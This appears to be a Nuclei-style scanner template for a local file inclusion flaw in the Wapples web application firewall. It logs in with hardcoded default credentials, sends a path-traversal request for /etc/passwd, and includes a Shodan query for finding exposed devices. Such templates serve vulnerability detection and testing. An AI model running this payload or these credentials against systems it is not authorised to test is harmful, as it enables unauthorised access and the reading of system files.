id: wapples-firewall-lfi

info:
  name: Wapples Web Application Firewall - Local File Inclusion
  author: For3stCo1d
  severity: high
  description: Wapples Web Application Firewall is vulnerable to local file inclusion.
  reference:
    - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"Intelligent WAPPLES"
  tags: wapples,firewall,lfi,authenticated

http:
  - raw:
      - |
        POST /webapi/auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id={{username}}&password={{password}}
      - |
        GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    attack: pitchfork
    payloads:
      username:
        - systemi
      password:
        - db/wp.no1
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

# digest: 4a0a00473045022100a947d06254f270b5abc4af88b5742bf780a8874840393c79dc0f925e527ce79702207e6839efe7dc0b5a1ba127e55dc3099c3225a5de79247bc38ac725da64dffe1c:922c64590222798bb761d5b6d8e72950
